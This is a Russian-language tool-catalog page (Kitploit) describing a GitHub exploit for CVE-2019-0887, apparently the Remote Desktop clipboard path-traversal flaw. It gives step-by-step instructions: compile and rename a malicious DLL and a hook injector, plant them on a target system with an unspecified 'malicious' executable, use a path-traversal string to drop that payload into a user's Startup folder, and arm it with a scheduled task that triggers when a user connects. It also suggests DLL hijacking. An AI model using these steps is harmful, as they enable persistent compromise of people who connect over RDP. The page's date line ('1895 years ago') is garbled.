Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/t43wiu6/cve-2019-0887
Privilege EscalationPersistence MechanismsExploitationLateral MovementPost-ExploitationPayload DevelopmentBinary Exploitation
GitHubt43wiu6/cve-2019-0887

CVE-2019-0887

exp for CVE-2019-0887

Репозиторий
1895 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-0887

Скомпилируйте CVE-2019-0887, переименуйте в winhlp.dll

Скомпилируйте Install_Hook, переименуйте в hook.exe

будьте осторожны, их нужно компилировать под x64

Поместите их в атакуемую систему, вот так:

root@kitploit:~
c:\windows\hook.exe
c:\windows\winhlp.dll

c:\windows\winhlp64.exe # что-то зловредное

Если кто-то захочет изменить путь, вот соответствующие места:

root@kitploit:~
# CVE-2019-0887/dllmain.cpp
WCHAR  evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR  efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };

# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");

Возможно, используйте taskschd.msc для создания плана задач, установите триггер «При подключении к сеансу пользователя» и укажите путь к hook.exe.

Ждите, пока кто-то подключится к вашей атакуемой системе, скопирует что-нибудь, и... уязвимость сработает.

Совет: почему бы не использовать DLL-хайджек?

Скачать инструмент